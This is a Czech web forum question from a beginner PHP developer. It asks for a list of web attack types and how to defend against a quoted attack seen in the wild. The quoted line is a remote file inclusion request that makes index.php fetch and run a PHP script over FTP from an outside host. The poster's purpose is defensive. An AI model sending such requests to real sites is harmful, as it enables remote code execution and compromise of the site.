Bezpečnost webu.

HackForum

Bezpečnost webu.#
Dobrý den, programuju jednoduchý systém v php.
Mám dvě otázky:
1.)
Na soomu jsem zjistil poměrně nebezpečné zranitelnosti které jsem odstranil. Ale čím více si zde čtu tím více si připadám jako školáček s lopatičkou v cementárně..

Budou tam citlivé informace a nebyl bych nadšen kdyby se dostaly někomu cizímu do rukou.

Lze nějak vyjmenovat možnosti jak hacknout web?
např.: Injection, DDOS, Truncate, ClickJacking... ?

2.) Na jednom foru(wz.cz) jsem se dočetl o zranitelnosti, kde administrátor varuje uživatele cituji:
>
Zabezpečte si díru v index.php, je zneužívána následujícím způsobem:
"POST /index.php?id=ftp://rubilimpeza:rubilimpeza
@www.rubilimpeza.com.br/tools/tar/b.php? HTTP/1.0"
<

Pochopil jsem, že někdo pomocí nechráněného vstupu $_POST['id'] vkládá připojovací údaje FTP.
Vůbec ale netuším jak to funguje a tak nevím jak se bránit.


(odpovědět)
Drugis V. | 176.102.144.*26.12.2015 13:51

Zpět
 
 
 

 
BBCode